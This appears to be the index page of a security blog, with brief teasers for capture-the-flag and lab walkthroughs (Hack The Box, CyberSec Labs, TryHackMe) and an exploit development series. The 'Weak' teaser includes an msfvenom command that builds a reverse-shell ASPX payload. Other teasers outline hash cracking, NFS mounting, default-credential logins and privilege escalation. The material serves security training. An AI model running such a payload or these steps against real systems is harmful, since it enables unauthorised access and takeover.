Secrets are meant to be secret

Part 1: Introduction to Exploit Development

Introduction This is the first part of my exploit development series. The first part will cover the basic things like Ideology, Mechanism behind exploits and a couple of things to keep in mind if we want to get to and… Continue Reading →

Hackthebox – Remote

Summary Mount the NFS Get the SHA1 hash from .sdf file Crack the hash with John Get the RCE Exploit Capture user.txt Run winpeas Found vulnerability on UsoSvc Escalate to Administrator with UsoSvc Get reverse shell as Administrator Capture root.txt… Continue Reading →

Weak CyberSec Labs Weak Walkthrough FTP anonymous login allowed upload shell.aspx rev shell and get a shell      msfvenom -p windows/x64/shell_reverse_tcp lhost= lport=443 -f aspx > shell.aspx Priv Esc Running whoami /priv we get SeImpersonatePrivilege token enabled So a… Continue Reading →

CMS Cybersec Labs CMS Writeup Another wordpress site Running WPscan we find /uploads directory Which has a screenshot of an id_rsa file’s location which is in /home/angel/.ssh/id_rsa also wpscan shows twenty twenty theme vulnerable but cant find anything But there’s… Continue Reading →

Shares CyberSec Labs Shares Walkthrough. As the name itself suggest, it has an nfs share open Looks like /home/amir can be mounted to our machine Using mount –t nfs  /tmp/shares/ we mount the amir share to our machine’s /tmp/shares/… Continue Reading →

Engine CyberSec Labs Engine Walkthrough Port 80 open Gobuster finds a directory /blog It is blogengine cms which is not configured properly and has default creds admin:admin There’s an RCE exploit available for the same Python –t –l… Continue Reading →

Attacking Kerberos

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further. Today let’s play  Tryhackme’s Attackingkerberos at[Task 1] Introduction This room will cover all of the basics of attacking Kerberos the windows ticket-granting service; we’ll cover the following:… Continue Reading →

The art of gaining root

Hi Guys, This is my First blog about Linux Privilege escalation. So Without wasting any time Let’s Start I’ll start with basics. So, /* WHAT IS LINUX AND PRIVILEGE ESCALATION? */ 1. Linux -: Linux is the best-known and most-used… Continue Reading →

Tryhackme – Blueprint

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further. Today let’s play Blueprint at “Do you have what is takes to hack into this Windows Machine?” Enumeration As always we start with a nmap… Continue Reading →

Attacktive Directory – Try Hack Me

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further. Today let’s play Attacktive Directory at Challenge Task 1 Initiate the VPN connection and deploy the machine Task 2 -> Impacket Install Impacket, this is a… Continue Reading →

« Older posts

© 2020 MYSTIKO — Powered by WordPress

Theme by Anders NorenUp ↑